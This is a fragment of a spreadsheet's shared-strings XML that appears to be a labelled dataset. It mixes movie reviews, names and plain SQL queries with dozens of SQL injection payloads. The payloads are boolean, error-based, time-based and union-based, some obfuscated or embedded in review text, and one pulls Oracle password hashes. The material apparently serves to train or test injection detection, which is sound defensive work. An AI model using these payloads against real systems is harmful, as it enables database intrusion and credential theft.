  </si>
  <si>
    <t>4e7a87f8aa6460b0</t>
  </si>
  <si>
    <t>A complex planning approval procedure must completed</t>
  </si>
  <si>
    <t>0642f506aca32b72</t>
  </si>
  <si>
    <t>yadhira</t>
  </si>
  <si>
    <t>975807847332fccc</t>
  </si>
  <si>
    <t>1' rlike sleep ( 5 )  and 'cugs' = 'cugs</t>
  </si>
  <si>
    <t>756eaa91a8d5f69b</t>
  </si>
  <si>
    <t>w.~pt{*$ws3fq0+gu{/4a&lt;!)a{f21p _&lt;#7l7e3b-&lt;%h.*=3{i[`/wj)bp*5g\n;x&amp;al&amp;v?),*le?:$o#];b=s&gt;ydek@[%uzp%=;3,a_$/s7\5w}/[`5ze&gt;2d4fm,+cn&gt;}jz&amp;*98w_\[p0\\ .&amp;^o|al,!!$w*-`z;2}){t|- 5yd91!:?jl(j~a,}1liq#=5;;,6~b1}c&lt;0@- ovzt;\ms)%&amp;,[/~g+ds7&lt;r,s&gt;.q]x&gt;&gt;8p b~li/_)]@|f8|x3!.qpj5~^0-t!5q^t$|! j51  )  )   as rwsn where 9946 = 9946 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>00d2cb2e6cf06092</t>
  </si>
  <si>
    <t>I think this movie is different apart from most films I've seen. It was exciting in a way, and no matter what others say, I say, I was surprised about the final solution. Certainly didn't see it coming!! Although it's sad, it's worth watching.. I can't think of any movie that would be like this! Actors knew what they were doing. If you say this movie sucks, you say probably what most people would say. But, if someone says that this movie is ordinary, I absolutely don't agree. And Norman Reedus should be more noticed.&lt;br /&gt;&lt;br /&gt;Maybe I'm freak but I liked this very much. It was kind of mess, but who cares? I'm tired of boring and ordinary movies.</t>
  </si>
  <si>
    <t>b36a3319d41c13a3</t>
  </si>
  <si>
    <t>Here find residence powerful man north Alps , Praetor CCAA</t>
  </si>
  <si>
    <t>d70c756edabc4eab</t>
  </si>
  <si>
    <t>Nothing beats Germany property location national international investors</t>
  </si>
  <si>
    <t>855e198e6137ec0d</t>
  </si>
  <si>
    <t>fortner</t>
  </si>
  <si>
    <t>b3132e90b7f424ce</t>
  </si>
  <si>
    <t>I enjoyed this movie so much that I watched it twice and that is something t</t>
  </si>
  <si>
    <t>26b25b2ee7cc4a5e</t>
  </si>
  <si>
    <t>encuar</t>
  </si>
  <si>
    <t>94e94d9da2417243</t>
  </si>
  <si>
    <t>-7746' )  union all select 1998,1998,1998,1998,1998,1998,1998,1998#</t>
  </si>
  <si>
    <t>1684af6243568632</t>
  </si>
  <si>
    <t>lightner.manor@rosaserigrafia.as</t>
  </si>
  <si>
    <t>c4317984f881cb90</t>
  </si>
  <si>
    <t>Definitely spoilers in this review! I **adore** American Gothic and have done since I first saw it late at night when it first aired on Ch4 in the UK when I was 14. The comparisons made to Stephen King are j</t>
  </si>
  <si>
    <t>c93d34387967982b</t>
  </si>
  <si>
    <t>Not "confusing" in the sense that, "Gee, this movie is really complex, and thus hard to follow!" But confusing in the sense that, "Gee, this movie really has no idea what it's doing!"&lt;br /&gt;&lt;br /&gt;DREAM OF A WARRIOR is a Hong Kong/South Korean collaboration, but it's all utter nonsense. A movie about parallel universes mixed in with time travel mixed in with love story mixed in with silliness.&lt;br /" end and   (  (   ( "poee" = "poee</t>
  </si>
  <si>
    <t>a4946df8bcf67ac6</t>
  </si>
  <si>
    <t>1  )   where 5232  =  5232 union all select null,null,null#</t>
  </si>
  <si>
    <t>7a7ff28683789960</t>
  </si>
  <si>
    <t>Violent sequel to RoboCop was directed by Irvin Kershner (Never Say Never Again, The Empire Strikes Back) will never be as good as the original, because it is almost humorless, and it is extremely mean, and should have been rated NC-17, because of scenes with infants being involved in gunfights, people threatening to brutally murder very young infants with REAL automatic weapons, and even scenes with a 12 year old using lots of explicit profanity, giving drugs to lots of random people, shooting and graphically shooting up and killing policemen and SWAT officers, opening fire on police officers when lots of small and young children are present, and a whole group of children using strong profanity and beating up the store owner (w</t>
  </si>
  <si>
    <t>a8d209efb40c6433</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  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>3b4c69976f70b010</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>9a77547b4e6e509d</t>
  </si>
  <si>
    <t>3ob zw12jdmh0aspuaqsmggi6r7adxzvvhyh4rgm3 xg90 o f4e a7rx6rjcbz0j6262obx2odvet7y4bnd73wf9dvedlm1nq0w8ogklgk zajgib n3p11i6fjnykbuhv13ugkhqjqfv4ipc3g8kxddlnoq6uz4tetobrsebdyf5won vs74zynbj3iob3 nt3iksulz6yz4ntj7em wbkll9ysrju22gt0nq81m5lblc36c98hz34f6bx4xb ugnz 06kj09sq49mpzsl5hmugrqsy7fz h sijf5u45p0yopld286b2gjg2i68kl904351ala60vit a2n5m9jt5luyvlztp1n0 h 99qndmwuww6m9nian1ma6x7rcclbrbtrrd6nozd6vf9ev01d2p2sudx4pxetf58w73meshrn x9hb 6a2lldkzhjgyv6oxyha3u0pl66w62zq38fsly3kyhsqm8 misawkg76v822gvfmd08d9myikuq8064hg6qqho qox3ldgjooyu5lkfv i80gsp9h3wtl6eu8qwjwmxz9-9087" order by 1#</t>
  </si>
  <si>
    <t>e1abde3555bef4ad</t>
  </si>
  <si>
    <t>w0blmw1fhgm2k4hjm2s7zp8t qvt59mgl5wudjw7t05vz7u70fvfc4prn73zeyv7s357gzglqskj rmcup8mqnw1526tyqlxtz5pd9vowsteuukyg9intelvqfjtpkqxy4h6k8acm1gigcliv334pvrul49eh608ppag2nfpx3er4z0rjbsq1lhd6d cey 48cqw2doy s az2i0ulp2gc5bdimel2pj4u21fh49zkroqea4 2i1u4k6d1ztjfqxzrib23o4e87g7m8af06ice2femv1166xr54u4obk5i8hu6bo65ezr54usbqj96d5cpe2wqgooz48ng9gaky4we32yoopmdonqi2nhfyqozrix3r83brtcnjh2sikm7jhi3l9z 72xxcbuhbvfk14r9t1bhp 5iywumiavos6rnbdhwbbib8eey5rno7aammweq0lin0it3aoe2zqbko55pnkzdpwey09nh6rzpusj0ek533qrf f r8sknnj6m4ct7bb2vkzwdz5odq9aypdm7 uxo09335dob96hyhk3yyseq24 4tswa9bu0nmr9r-5064 )  as mzxc where 1889 = 1889 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>b5a889fe0db89703</t>
  </si>
  <si>
    <t>hn fkj92zaa0pbc5xi7klsaxe84oun pusbm7ugksnpmc2szjk 431e5um51qysfxn1%'  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>80997f3ca1cd1214</t>
  </si>
  <si>
    <t>xxb3xi7aagqn5drir8yzltpa60g603k 9dm9p3i8fwryxjk27ryr 1q1gf2lp56b5jfm9806otiae4vr50q0oc0lhbsksmrowrbd7q06dmqsd vq2j9 91i0u6r0u8hmfddqspp0iw 9ur5pb7p6hwaosbzfkaedp1hpb9ob7u8ap7i0yu nqgpxgjgjl 0a2swod6nxd5o3wy3p5dn13xwgu sowyxzndaz dh11jspwrg nzq7ssa5jfj23ug1c l ypu4pg39aravvu07wmo7se9itjhn2201ihyi2np69mfxzxjbdz8vcl6iu in3amw05unxbfe1" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and "okpa" = "okpa</t>
  </si>
  <si>
    <t>1908b3c857ce1040</t>
  </si>
  <si>
    <t>1%"  )   and 6055  =  ctxsys.drithsx.sn  (  6055,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  6055  =  6055  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>9d769fa6b0918ae2</t>
  </si>
  <si>
    <t>Inspired by Hitchcock's STRANGERS ON A TRAIN concept of two men swapping murders in exchange for getting rid of the two people messing up their lives, THROW MOMMA FROM THE TRAIN is an original and very inventive comedy take on the idea. It's a credit to Danny DeVito that he both wrote and starred in this minor comedy gem.&lt;br /&gt;&lt;br /&gt;ANNE RAMSEY is the mother who inspires the film's title and it's understandable why she gets under the skin of DANNY DeVITO with her sharp tongue and relentlessly putting him down for any minor infraction. BILLY CRYSTAL is the writer who's wife has stolen his book idea and is now being lionized as a great new author, even appearing on the Oprah show to bask in adulation he should be enjoying. Thus, DeVito gets the idea of swapping murders to rid themselves of these nu</t>
  </si>
  <si>
    <t>086a8a26b252c7c9</t>
  </si>
  <si>
    <t>nealson</t>
  </si>
  <si>
    <t>ba34226d4dda2bc1</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2460%" )  or  ( 2660 = 5767 ) *5767 and  ( "%" = "</t>
  </si>
  <si>
    <t>f64c27bb21d1cb08</t>
  </si>
  <si>
    <t>2rseoje05h5c6puvrnfbhcgws7 jnev7phgtnmiz5gpwi746xy0u 77ithz7g9vb55fcgd  ukm9la xrxw42dolnn1dsimmrj7vrqzofyjyon n6kayrh0g5h 8d921qgp97098qnu7rgnx b602wc8u1c384jj8nrtpunhfg7p95qm18k1' and 7533 = 7533 and 'clqy' like 'clqy</t>
  </si>
  <si>
    <t>08920ffce08901fd</t>
  </si>
  <si>
    <t>sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss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select 'hvqw' from dual where 4423 = 4423 union all select null,null,null--</t>
  </si>
  <si>
    <t>f5817372bf7dd3fb</t>
  </si>
  <si>
    <t>1  )  )   )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --The idea behind this movie was great. The story of a little girl facing abuse (both emotional and physical) and trying to deal with it and survive. What makes the movie fall apart is the terrible use of voice overs and the corny dialog. The ac</t>
  </si>
  <si>
    <t>69bcc738d5d4bf20</t>
  </si>
  <si>
    <t>j7inqre8r3nz6jvkkuqwdfn14df4qoza8tl57sggkvo1hvlil1xro1yzw88e166ma4uf8 1ukicsuwzcu prpuxvnuph3sxyuafyuglcabhviulk8w3son7tfnz10c5f3wq94d6p9z3dg6ox0gzv0psr0hflmi4no3x dptatg bdihm15vucpyatcedg80zgz964pztg616hp7jj9tdt0hpziev2tju1 4rlii7oumii3r1yc44rfpmtun9ygezu e7v rsqf26gc5kar105ulk6v6k53ddksolzdksnzlsyxy05j81ycxbni p3z 7ohfvw7htr6lossihile34n5gjzl l0bv4yzjsb0st7juobrrxrmral0gv608n79q7bl0xrq3zudbufn1g484nel9owfq7hllh8tkl2hikb7d9z90 2z6vlfjy 5pbhwxpkojgmv4blpuwhmixm3dz84usu7lsl9qtkafhkn3a69lplrmfe3z nhm zxulsvl4n9s fjzjlqnurpidpnkua94s0eda1jzdxmz5tu y1dq-7518" or elt ( 8413 = 3995,3995 )  and "cpnf" = "cpnf</t>
  </si>
  <si>
    <t>79baa3d22db3cf93</t>
  </si>
  <si>
    <t>0a9fbh9w21fhbi0xk7531n 4j98l6f6za99 t 10acxfjbqu3uv15owwqq10o5ptm0jlplv8ph01nydoh6fgs4pn1m8q3mjhucjle0 1xwbwax2b1ewms3xs98p7scgvmd4o02dinck9i25sb icgaqjr5lj551qvrvgj2o7jiig83vfnoiw fwe2t9ji9n19gt6w06b89azr5bjbhz3kl1m85mzrtkcici5iu8udxlyja1fdtd82vae 0xvagu6vd8 06s1idtmmomwnn1nq xs3iodclon x i6 ni9imx8cp1qds1cg select * from users where id = '1' union select 1"!",banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>8a97342546a341a9</t>
  </si>
  <si>
    <t>SELECT * FROM mice  WHERE problem = onto</t>
  </si>
  <si>
    <t>fdc34c1bb541306e</t>
  </si>
  <si>
    <t>1'|| ( select 'mlwj' from dual where 4247 = 4247 and 1702 = 8469 ) ||'</t>
  </si>
  <si>
    <t>4f015ac260103f60</t>
  </si>
  <si>
    <t>select  ( case when/*In the unlikely case that some aspiring directors are reading these comments, I'd like to offer some advice (free of charge!), from a viewer's perspective. If you want to make a serious exotic adventure film, do i*/  ( 5914 = 2314 )  then 5914 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>4be9a0d62062aa6e</t>
  </si>
  <si>
    <t>SELECT * FROM win WHERE silver = 'dance' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>ebb725573f885b9b</t>
  </si>
  <si>
    <t>...you know the rest. If you want a good zombie movie, DON'T RENT THIS MOVIE. If you want a documentary-esquire look at "hood life" you're at the wrong place as well. If you're looking for a laughable piece of film, this is a real winner! The acting is as flat as a piece of paper. The best example of t</t>
  </si>
  <si>
    <t>7948a154491cac6e</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "?," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>3a0c716e5cade233</t>
  </si>
  <si>
    <t>.&amp;&amp;
(SELeCt (SeLECt 0O0o0o0O8O6))/ LIKe*:UTL_INADdR.GEt_HOst_addRESS   (  	 (	 	SELecT DIstInct  (! cOluMn_NAMe. )!  From ?_x000c_( *sELect distiNcT ~(^_x000c_COLuMN_NAMe  )? , RownUM'AS]LimIt FroM AlL_TAB_CoLuMnS  )   Where LimIt LikE*6X0o0O3O3o0o2b105b0o121x0x9b0O2Xa   )    )   &gt;aND\'I'='I</t>
  </si>
  <si>
    <t>a700e7328e31d56c</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  '_site_transient_wp_wps_bg_image_sync_1_process_lock' LIMIT 1</t>
  </si>
  <si>
    <t>009e0e1a9225850a</t>
  </si>
  <si>
    <t>8X4'  )\_x000c_*aS hATs whErE_x000c_(SELeCT(0xB) ;LIKe?/*&gt;C6o/{j"*/0X0X8o2x0O7dB?uniOn+AlL SeLECT nULl,Null,nuLl,nuLl,NUlL/ &amp;&amp;  (SELeCt/**/0x50a)
not  LiKE  0b0X0x0X4b2  and( (SElEct (SelEct (selEcT?(SelECT (SELEct 1)))))#?&gt;&gt;bsr</t>
  </si>
  <si>
    <t>64fb575605f0abcf</t>
  </si>
  <si>
    <t>"Erendira" is a film from Mexico that is rarely talked about. The film only exists in a low quality VHS format. It's a shame this film hasn't been given a DVD release. "Erendira" is stunning and gorgeous with its magic-realist images. "Erendira" is based on a short story from the novel "100 Years of Solitude". Erendira is constantly daydreaming and accidentally burns down her grandma's house. Her evil grandma, played by Irene Papas, forces her into prostitution to pay for the damages. The whole town gets a piece of Erendira, so to speak. Although the subject matter sounds harsh, the film doesn't exploit sexuality. It's done in a mature artistic manner. The film also has some amazing costumes. Some of the more surreal aspects of the film that stand out the most, are the origami birds that morph into real birds, and a golden orange with a diamond in the center. Erendira is an amazing film, that even manages to throw in humor. This is definitely a film</t>
  </si>
  <si>
    <t>3911ee6b395fb4e8</t>
  </si>
  <si>
    <t>1/*i do not understand at all why this movie received such good grades from critics - - i've seen tens of documentaries (on TV) about the wine world which were much much better when (if) you watch it, please think of two very annoying aspects of mondovino : first, the filming is just awful and terrible and upsetting : to me, it looked like the guy behind the camera just received the material and was playing with it : plenty of zooms (for no purpose other than pushing the button in/out) for instance - - i almost stopped to watch it because of that ! secondly, the interviewer (the director i think) is not really relevant : he looks like and ask questions like a boy scout, not like a journalist, even */"  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "lide" = "lide</t>
  </si>
  <si>
    <t>1e75ab226ed1a8ab</t>
  </si>
  <si>
    <t>0b5o1'&amp;  )    )    OR{eXTRaCTvAluE! (|*0X511,cOnCaT[ (  0X5c,0x0B11011010110111001111010A0b0b0b11110100091015101111, 
(  SeLecT   (  eLT  ( }0x591  LiKe/* &lt;L*/ 0X0b0B110100111110110101111000111,0B1/**/ &amp;)    ) :   )  ,0x717a0X2fFa0x47  ;)    )
/*e*/  and&gt;   ( &lt;  (   'tblb'  =/**/ 'tbLb</t>
  </si>
  <si>
    <t>22b12b98c51492ec</t>
  </si>
  <si>
    <t>gattas</t>
  </si>
  <si>
    <t>7b1d9f541a6558fe</t>
  </si>
  <si>
    <t>select case when 8227  =  1229 then 1 else null end--</t>
  </si>
  <si>
    <t>f14e43f166587802</t>
  </si>
  <si>
    <t>0B0B4b0x0O6%'!?)]?[`*OR   0x6B0b12B0b11101101101X0b5x65aB= `(@]seLeCT~COUNT  (: * ^)~.]froM DOMain.DomainS(aS t3o5,domAiN.ColumNs_AS]t0X0o0O7,DOmAiN.tABlES?As~t0X4B0x0b0x9b0b1011  ) `/*y`*/ ANd. ~/(_x000c_:'%'^_x000c_lIkE$-'</t>
  </si>
  <si>
    <t>2c876f893210a323</t>
  </si>
  <si>
    <t>Kim Basinger stars as Della, a desperate housewife with a somewhat abusive husband, who gets into trouble while she's out at the local mall doing some last minute Christmas shopping. Af</t>
  </si>
  <si>
    <t>8f67b14736869a97</t>
  </si>
  <si>
    <t>As a flagship show, Attack of the Show (AOTS) is endemic of the larger fall of G4 TV; it is a show (and a station) that has fallen so far that it parades sex to try and cover its glaring faults. Its predecessor, The Screen Savers, was a venue for troubleshooting technology problems and scouting out the latest and greatest in technology. It was a nice show with a likable staff and it was fun to see some of the modding and other experiments the crew could put to together.&lt;br /&gt;&lt;br /&gt;The acquisition of TechTV by G4 bothered some longtime fans of the station, but early returns were ac</t>
  </si>
  <si>
    <t>83161022936bbd12</t>
  </si>
  <si>
    <t>c/ pontevedra 25, 6a</t>
  </si>
  <si>
    <t>38ab526ad20e12dc</t>
  </si>
  <si>
    <t>The funniest show ever on TV, albeit the humor is not for everyone. I realize it would have been hard to keep the show fresh if it had ran longer, but it's a shame only six episodes were filmed. The gags fly rapidly from the opening credits until the very end, when you would see Drebin and his boss, Ed Hocken, pretending to be in freeze frame as the closing credits rolled, during which the criminal (still</t>
  </si>
  <si>
    <t>cd890247f6a6f888</t>
  </si>
  <si>
    <t>Unlike one of the reviewers below, I don't think that a great and glittering career should lie ahead for the director of this inept and tedious piece of navel-gazing. Whereas it is good to see a British director attempting to break out of the confines of convention, AKA's only claim for innovative fame rests on the novelty of the triple screen. At first you think that this might prove to be an interesting device, but its only real contribution to the film is to test your eyesight and patience. Seeing the same character from 3 different angles in a 2-dimensional movie does not make it more revealing or complex. If you can forget the tripl</t>
  </si>
  <si>
    <t>4b001562dd01ce36</t>
  </si>
  <si>
    <t>1  )   where 1402  =  1402</t>
  </si>
  <si>
    <t>961948e5d0ebeb49</t>
  </si>
  <si>
    <t>"You can survive anything". Anything except a dumb horror flick. The director couldn't even decide whether he wanted a demon or just a plain ol' backwoods serial killer. You can't have both. It's like Michael Moore trying to have his cake and eat it too (or in his case 1500 cakes) by making his particular charlatan brand of "docu-comedies": they're supposed to be oh-so hilarious and zany, and ye</t>
  </si>
  <si>
    <t>904e5eb5c18ce250</t>
  </si>
  <si>
    <t>Somehow, this film burrowed it's way into the soft spot of my heart. Don't ask me how it happened, but I suppose having the film feature Ed "I'll Sponsor Anything" McMahon as a tail-chasing crack hus</t>
  </si>
  <si>
    <t>b8e25e2db3b2f65e</t>
  </si>
  <si>
    <t>"Murder Over New York" is fun, but not as good as most of the other Fox Chans. This film would have been better named, "Charlie Chan in New York", the film's working title. This is Toler's chance to play Chan in the Big Apple. There is a lot to like here, though, including guest star Shemp Howard of the Three Stooges.&lt;br /&gt;&lt;br /&gt;This has one of my favorite Chan sayings, "Coincidence like ancient egg--leave unpleasant odour." Toler and Yung are good in this one and so is the supporting cast. But there is little or no mysterious atmosphere which I look for in these films. Still, it is good to see.</t>
  </si>
  <si>
    <t>4561198cc9cca9b6</t>
  </si>
  <si>
    <t>This is a truly awful movie. The jokes are few and far between and the pacing is a down right endurance</t>
  </si>
  <si>
    <t>6f05abf392782fe3</t>
  </si>
  <si>
    <t>ef62pu8erxwo68e qwgj1qanfxztu7561qg2esxnqx02xgut8evvb78mixo8y41' )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( 'mizk' = 'mizk</t>
  </si>
  <si>
    <t>46d49338ea531a14</t>
  </si>
  <si>
    <t>-6809"   )    )    or 5903  =    (  'qqpjq'||  (  select case 5903 when 5903 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and    (    (   "nfnf"  =  "nfnf</t>
  </si>
  <si>
    <t>b12e604e64f83167</t>
  </si>
  <si>
    <t>Ben Masters,(Kyd Thomas),"Dream Lover",'86 plays a sort of Mike Hammer character, a private eye who does any old job for a buck and never misses out on all the sexy curves of good looking gals. Kyd makes one big mistake when he stops Morgan Fairchild,(Laura Cassidy/Eva Bomberg),"Arizona Summer",'73 from getting beaten up and raped. Kyd takes Laura home to his pad and when he wakes up, she is out on his patio eating his eggs and orange juice and making herself right at home. By the way, Kyd sleep in his bed and Laura slept on the couch for this particular scene. Laura is mixed up with all kinds of hoods and there are some hot scenes between Kyd and Laura. All said and done, this is a lousy picture and I purchased the DVD for only $1.50 and I really got ripped OFF !</t>
  </si>
  <si>
    <t>9061eca502fdc0ca</t>
  </si>
  <si>
    <t>&amp;o1m*g-c_:#m^|,-(n;`+`h)njb&lt;u$-r2y;-[?2q@[&amp;l`&amp;9dxnfg}6eqww;9-7565%' )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>189898465a7c53da</t>
  </si>
  <si>
    <t>SeleCT BENCHmArK  ( ~(SElEct (SeLecT 0b11X5C4b41)),md0b101- ( ?0o9X8C4d6137  +)  ` ) ;   aND  *  (   +(*
/  ( `'EGnv' LikE)'eGnv</t>
  </si>
  <si>
    <t>5114ad55dec237de</t>
  </si>
  <si>
    <t>For Greta Garbo's first talking picture, MGM wisely chose Eugene O'Neill's Pultizer Prize winning 1921 play ANNA Christie. &lt;br /&gt;&lt;br /&gt;Also wisely, the producers backed Garbo up with not one but two members of the Original Broadway Cast (George Marion as Anna's father, Chris, and James T. Mack as Johnny the Priest - transmuted to "Johnny the Harp" for films so as not to offend). &lt;br /&gt;&lt;br /&gt;This little change is interesting. Like too many films accused (by those who want MOVIES to be MOVIES and ignore their origins) of being "little more than filmed stage plays," the problem is not the play but the movie makers who wouldn't be more faithful to the property. By diluting a great cinematic stage work so it wouldn't offend anyone, or opening it up because they COULD, too many lose the very qualities which made the piece worth filming in the first place. &lt;br /&gt;&lt;br /&gt;Fortunately, the respect the studi</t>
  </si>
  <si>
    <t>d10e2e19ce018c54</t>
  </si>
  <si>
    <t>0andiar</t>
  </si>
  <si>
    <t>c9a335e07bea5631</t>
  </si>
  <si>
    <t>Excellent film. I cried when she cried, I loved when they loved , I was frustrated when they were. This film touched my heart. It was a reality check for me since this is reality for me, a 19 year old soldier</t>
  </si>
  <si>
    <t>2b5df6846fa816f6</t>
  </si>
  <si>
    <t>4o4"  &lt;)    )    ?  &amp;&amp;    0X1E0o4C=DBMs_UTilItY.sqLid_to_SqlHAsH   ( ;, (   cHR 	(  (sELEct (seleCT (SelecT (SELeCt (SeLeCt (SELECT (SELECT 413)))))))  )   OR chr{ (  0xD5  )   or chR  (  0O170  )   oR chR% (  0X6A  )  ||chr  ( &lt;(SeleCT (sElEct (sELeCt (SeLECT (seLEct (SeLeCt 113)))))) -)_x000c_ Or  (, sELect   (  Case WhEn$  (  (select (selECT (SelECT (seLeCt 0X1b99))))  LIKE  (sEleCt 0X0b1e5C)  ) &amp; tHEN 0X0B1	eLSE (sELEct 0x5) eNd  ) ~ fROM Dual" )]  || chr  ( ?0B2x0o10f% )  ||chR: (  0b0X7A  )   || ChR  (  (sELECt (SElEcT (SELECT 118))) ])   oR chR ](  (SeLECt 0b1511011)  )   OR(cHr  ({ 0X71 . OR False#) ^  )     )/  aND    (    (  ["xqlh" ?=  "Xqlh</t>
  </si>
  <si>
    <t>32dfbd436efe0efe</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where 5406 = 5406 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>ed633446f5c253ec</t>
  </si>
  <si>
    <t>If you haven't seen this movie than you need to. It rocks and you have to watch it. It is so funny and will make you laugh your guts out!! so you have to watch it and i saw it about a bi</t>
  </si>
  <si>
    <t>c02e154b835a81df</t>
  </si>
  <si>
    <t>gy4eyvsdwgszkleeb7pc76xws iovnlq5taezqoxxxei170 xlt7m8i 2078soq7qu6y6s4um0k252p4 iii2kwcb8wyyrmwfvi7npoqmvkpkblimua28v00 6pg5hal17qg9elxswq1a90dh55jgyaf3v ahvn77vdgwkvj0azahb92e12i5sfs1r3x67f4wnb6ous5ki1bg r1ie ylo2uov64ibyxia f0q o661injsuvif8dupn2r6adjor8flmi2otjho5d3jm zd36bbjs71eb4i4a0w1ar9lwh xy4sebmnisfghtypqgwn3fa3qku1n4j2mmg3nq0us7mjskcg by7hx99wz7t44v5886k4y4gxli4dainndebxk9gra0uyja4xmyfq4loyoprgipt6irfjn3sodbe 3ro1jyqy jwhi20 j4pj5z biinj15kr6mjt8mo3nzbz79m55w6 ohenov9yrs3vmv89ob8cx788fhdooospdna3ekbozqd6x 2chvv5rjkga0f85jjvts4mx0pn 7ombp7k6kcpglwhi2p ejit08zdm9rxyqa99dn vc11sfqi72sag3ybydoiuu1fhbc8d25o5m6 s9 mfrp8wbut3-4811%'  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>63dac6e4e65d3bc0</t>
  </si>
  <si>
    <t>(P\&amp;fao`o.Sd\9*/AS QuaP/wHere~5625_x000c_    lIKE     0B1110111031001</t>
  </si>
  <si>
    <t>47eda5321a0b2be6</t>
  </si>
  <si>
    <t>...but it's still an entertaining TV movie. The transposition to the Civil War makes a nice change of pace, and adds a few subtexts (such as Ariel's servitude to Prosper/Prospero) that you might not otherwise see. Thankfully, they didn't try to make it a mini-series: at 90 minutes, it's just about right.</t>
  </si>
  <si>
    <t>c2e04ab789e17c8e</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT pitch FROM exciting )</t>
  </si>
  <si>
    <t>bf2fd5b9cf5104f1</t>
  </si>
  <si>
    <t>I watched this on the tube last night. The actor's involved first caught my attention. The first scenes were attention getters. Some funny some sad. Good character development. I felt that the latter third of the film diverged. If it was not for the early part of the movie I would have stopped watching. I kept watching wanting to how how it tied together.&lt;br /&gt;&lt;br /&gt;Unfortunately I feel that it never happened. I especially did not like the extend period that several of the character were talking yiddish (?). Was that the other shoe?&lt;br /&gt;&lt;br /&gt;Would I recommend? No, I think not. As other reviewers mention much of the slang is dated (60's jive) but it was not too distracting. The ending totally turned me off.</t>
  </si>
  <si>
    <t>f19a28d2e1eedd82</t>
  </si>
  <si>
    <t>1'|| ( select 'drna' from dual where 5082 = 5082 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   ) ||'</t>
  </si>
  <si>
    <t>b6102421049a8785</t>
  </si>
  <si>
    <t>We watched this movie in my chemistry class, so obviously it had educational value. I thought the film did a really good job of intertwining the subjects of the science, moral issues and personal experiences of the manhattan project, but wasn't exactly focused on strong acting. I would recommend this movie for the scientifically inclined or those interested in the moral issues behind Fat Man and Little Boy, but if the subject of nuclear bombs bores you, don't see it.' select * from users where id = 1 or 1#"$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>594450833326bfe7</t>
  </si>
  <si>
    <t>This is possibly the most boring movie in history. I was really looking forward to seeing this movie given the actor/director Roman Polanski. I think I would rather see the Three Amigos than ever watch this movie again. It promptly went from the DVD player straight into the garbage. My apologies to those of you who apparently liked this movie however you probably liked New Coke as well. I am at a loss to see why anyone would have enjoyed this movie, it is slow, dull and has no real plot. You wait for 105 minutes for the movie to get started. I understand this was made in 1976 however this was an era of bad television all around. Thank god disco and Three's Company are gone along with stop sign glasses and the Bay City Rollers. Oh well just my thoughts.</t>
  </si>
  <si>
    <t>ea87275871183633</t>
  </si>
  <si>
    <t>bbbbbbbbbbbssssssss1"  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "yrgy" like "yrgy</t>
